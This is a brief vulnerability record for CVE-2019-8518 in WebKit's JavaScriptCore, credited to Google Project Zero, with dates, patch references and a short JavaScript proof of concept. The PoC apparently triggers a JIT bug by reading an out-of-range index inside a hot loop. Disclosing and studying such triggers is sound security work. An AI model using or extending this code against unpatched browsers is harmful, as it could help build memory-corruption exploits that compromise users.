CVE-2019-8518.md

CVE-2019-8518

• Report: Feb 2019
• Fix: Mar 2019
• Credit: Samuel Gross, Google Project Zero

PoC

// Run with --thresholdForFTLOptimizeAfterWarmUp=1000

// First array probably required to avoid COW backing storage or so...
const v3 = [1337,1337,1337,1337];
const v6 = [1337,1337];

function v7(v8) {
    for (let v9 in v8) {
        v8.a = 42;
        const v10 = v8[-698666199];
    }
}

while (true) {
    const v14 = v7(v6);
    const v15 = v7(1337);
}

Reference

• iOS 12.2
• macOS 10.14.4
• WebKit
• Patch
• Google Project Zero